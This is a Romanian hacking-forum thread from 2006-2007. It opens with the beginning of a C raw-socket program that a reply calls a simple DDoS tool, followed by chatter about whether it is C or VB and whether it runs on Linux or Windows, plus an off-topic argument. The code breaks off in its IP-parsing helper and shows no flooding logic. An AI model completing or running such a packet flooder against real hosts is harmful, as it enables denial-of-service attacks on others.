Fatal1ty Posted August 13, 2006 Report Posted August 13, 2006 #define DEBUG#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <string.h>#include <fcntl.h>#include <time.h>#include <sys/socket.h>#include <netinet/in.h>#ifndef __linux__#include <netinet/in_systm.h>#include <netinet/ip.h>#else#include <endian.h>#include <bsd/netinet/in_systm.h>#include <bsd/netinet/ip.h>#include <linux/wait.h>#include "/usr/src/linux/net/inet/skbuff.h"#endif#include <assert.h>static unsigned int wait_time = 0;static unsigned int packet_size = 80;static unsigned int packet_count = 1000;static int gateway = 0x0100007f;static int destination = 0;static unsigned int uflag = 0;static unsigned int tflag = 0;static int socket_fd;static struct sockaddr dest;/* Convert an ASCII string to binary IP. Borrowed from linux/net/inet/utils.c */unsigned longin_aton(char *str){ unsigned long l; unsigned int val; int i; l = 0; for (i = 0; i < 4; i++) { l <<= 8; if (*str != ' Quote
Sad_Dreamer Posted August 13, 2006 Report Posted August 13, 2006 nu simplu ddoser :-I si postat unde nu trebuie...trebuia la PROGRAMARE Quote
!_30 Posted September 7, 2006 Report Posted September 7, 2006 @zbeng , daca nu ti se pare codul chiar as de bun , inseamna ca ai inteles de minune codul sursa , IN C , si nu iit place ce si cum ? asa-i .. Quote
JoKeR Posted April 10, 2007 Report Posted April 10, 2007 Dak citeai mai sus si _30 a zis k ie in C Quote
avkhackteam Posted April 10, 2007 Report Posted April 10, 2007 Sub-ZeroX a scris:codu asta e pt VB ?? :D Quote
avkhackteam Posted April 11, 2007 Report Posted April 11, 2007 Sub-ZeroX a scris:codu asta e pt VB ??Mah esti chiar penal pe bune si hai sa iti zic de ce .. ai intrat pe forumul meu si ai postat la programare tutoriale visual basic asta pe data Mon Apr 09 2007, 12:26AM apoi ai intrat aici si ai dovedit ca nici macar nu iti dai seama de diferente .... .Cum am postat ca vreau sa pun admin pe site meu imediat te-ai oferit cu toate ca abia venisei ) crezi ca lumea pune asa admin aiurea ? astepti prea multe de la viata fara sa faci nik ... Oricum ai ban pe site meu nu am nevoie de oameni praf si de oameni care fac copy paste fara sa stie ce inseamna macar .Srry pentru off topic dar m-am enervat rau . Quote
JoKeR Posted April 11, 2007 Report Posted April 11, 2007 avkhackteam ce forum ai?dak ie zimi pa mess pa alex_smen_19 sa nu fie publicitate Quote
Blades Posted May 10, 2007 Report Posted May 10, 2007 mane aste e pt linux pt windows nu sti :Smile: Quote
Tot_zeu Posted June 12, 2007 Report Posted June 12, 2007 e pentru linux..daca modifici pathul headerului aluia s-ar putea sa mearga si pe Win Quote